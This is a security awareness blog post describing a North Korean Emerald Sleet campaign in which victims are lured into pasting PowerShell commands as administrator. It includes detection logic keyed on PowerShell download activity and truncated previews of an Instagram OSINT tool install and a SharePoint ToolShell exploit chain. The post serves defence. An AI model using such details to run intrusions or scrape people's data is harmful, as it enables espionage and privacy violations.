Hackers Are Tricking People to Hack Their Own Computers



Imagine a hacker doesn’t break into your computer.
Instead, they convince you to open PowerShell as an administrator and paste their code yourself.

That’s exactly what’s happening in a new cyber-espionage attack uncovered by Microsoft Threat Intelligence — and it’s both clever and dangerous.

This attack is being carried out by a North Korean state-backed hacking group called Emerald Sleet, also known as Kimsuky or VELVET CHOLLIMA.

Let’s break it down in simple language, so anyone can understand it.

 

What Is This Attack About?

Instead of sending malware or exploiting software bugs, hackers are using trust and psychology.

They:

  • Pretend to be government officials

  • Build relationships with victims

  • Then trick them into running malicious PowerShell commands themselves

No hacking skills required from the victim — just one mistake.

 

Who Are the Hackers?

Emerald Sleet is a North Korean government-backed cyber-espionage group.

They usually spy on:

  • Government employees

  • NGOs

  • Journalists

  • Researchers

  • International affairs professionals

Especially people working on Northeast Asia–related topics.

Their goal isn’t quick money — it’s stealing sensitive information.

 

Who Is Being Targeted?

Microsoft observed attacks against people and organizations in:

  • North America

  • Europe

  • East Asia

  • South America

The victims include:

  • Government agencies

  • NGOs

  • Media organizations

  • Think tanks

  • Policy experts

 

How the Attack Works (Step by Step)

Step 1: Building Trust

Hackers pretend to be South Korean government officials and communicate politely over time.
Nothing suspicious at first.

Step 2: A Convincing Email

Once trust is built, the victim receives an email with:

  • A PDF attachment

  • A message saying the document needs device registration to open

Sounds official, right?

Step 3: The Fake Registration Link

The email contains a link that:

  • Looks legitimate

  • Claims to register your device

  • Gives instructions to proceed

Step 4: The Dangerous Trick

The website tells the victim to:

  1. Open PowerShell

  2. Run it as Administrator

  3. Copy and paste code provided on the page

⚠️ This is the critical moment.

The victim unknowingly runs the hacker’s code themselves.

Step 5: Your Device Is Now Registered to Hackers

Once the code runs:

  • A remote access tool is installed

  • A digital certificate is downloaded

  • The device is secretly registered to a hacker-controlled server

From this point on, attackers can:

  • Access the system remotely

  • Monitor activity

  • Steal files and emails

Why This Attack Is So Dangerous

This attack works because:

  • ❌ No virus file is attached

  • ❌ No software vulnerability is exploited

  • ❌ No warning pop-ups appear

  • ✅ The user gives admin access willingly

Security tools often trust administrator actions, which makes this attack very effective.

Signs Your System May Be Compromised (IOCs)

Here are simple warning signs to watch for:

On Your Computer

  • PowerShell opened as Administrator without IT approval

  • Unknown remote access tools installed

  • Strange certificate files appearing suddenly

On the Network

  • Your computer connects to unfamiliar websites right after PowerShell runs

  • Unusual background internet activity

What Microsoft Says

Microsoft confirmed:

  • This activity has been observed since January 2025

  • Microsoft Defender XDR can detect this behavior

  • Targeted users are being notified

How to Stay Safe

For Everyone

  • ❌ Never run PowerShell commands sent via email or websites

  • ❌ Don’t trust “device registration” instructions from emails

  • ✅ Verify requests through official channels

For Organizations

  • Train employees about phishing and social engineering

  • Monitor PowerShell usage closely

  • Restrict administrator privileges

  • Use advanced email and endpoint protection

The Big Lesson

Hackers don’t always need advanced malware.

Sometimes, all they need is your trust.

This attack proves that:

  • Humans are the new attack surface

  • Social engineering is more powerful than exploits

  • Awareness is just as important as antivirus software

📊 Detection & Monitoring (SIEM / XDR Mapping)

Microsoft Defender XDR Capabilities

Microsoft confirmed Defender XDR can detect:

  • Abnormal PowerShell usage

  • Credentialed PowerShell sessions

  • Suspicious device registration behavior

🔎 Sample Detection Logic (High Level)

Suspicious Admin PowerShell Execution

ProcessName = powershell.exe
AND UserContext = Administrator
AND CommandLine contains "Invoke-WebRequest"

PowerShell Followed by Network Activity

powershell.exe → outbound HTTPS connection
within short execution window

Final Thoughts

Emerald Sleet’s latest campaign shows how simple instructions can lead to complete system compromise.

If an email ever asks you to:

“Open PowerShell as administrator and paste this code”

That’s your biggest red flag 🚩

When in doubt — don’t click, don’t paste, and ask first.

Comments

Post a Comment

Popular posts from this blog

OSINT Tool in Termux

Image
The Instagram OSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile The information includes: [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc [ tags & mentions ] : most used hashtags and mentioned accounts [ email ] : if any email is used any where it'll be displayed [ posts ] : accessability caption, location, timestamp, caption, picture url, etc ( yet not working correctly with posts instagram marks as 'sensitive cotent' ) How To Install apt update && upgrade -y Pkg install git pkg install python3 git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig python3 -m pip install -r requirements.txt Usage python3 main.py -u username
Read more

Active Directory Ransomware Attacks

Image
    Organizations worldwide use Active Directory (AD) as their primary identity service , which makes it a top target for ransomware attacks . This article explains how adversaries exploit Active Directory during ransomware attacks and provides strategies and tools for defending against this modern menace. The two phases of a ransomware attack A common misconception about ransomware attacks is that they are quick: Someone opens an infected email attachment or inserts an infected USB device , and within minutes data across the network is encrypted and a ransom demand is displayed on every screen . The reality is quite different. Ransomware attacks today tend to be quite sophisticated and methodical . To encrypt as much sensitive information as possible and therefore maximize the chances of receiving a high payout , attackers proceed in two phases: Find an entry point — The first step is to gain a foothold in the victim organization ’s network . One common strategy is to comp...
Read more

Colt Telecom Hit by WarLock Ransomware: SharePoint Zero Day Used for Mass Data Theft

Image
  What Happened On August 12, 2025 , Colt Technology Services—a UK-based telecom giant—experienced a cyberattack that disrupted several internal support services, impacting systems like Colt Online, porting, and Voice API platforms, while core network services remained unaffected. Who Claimed Responsibility A threat actor using the handle "cnkjasdfgd," claiming to represent the WarLock ransomware group , offered 1 million stolen documents for US$200,000 , providing sample files to prove their legitimacy. Made Possible By The attackers exploited a critical zero-day vulnerability in on-premises Microsoft SharePoint (CVE‑2025‑53770), which was publicly patched on July 21, 2025. Technical Breakdown (“ToolShell” Exploit Chain) Attackers used a sophisticated exploit chain now dubbed ToolShell , involving multiple steps: 1. Initial Access – Bypassing Authentication A crafted HTTP POST to the /_layouts/15/ToolPane.aspx endpoint with a spoofed Referer header (/_layo...
Read more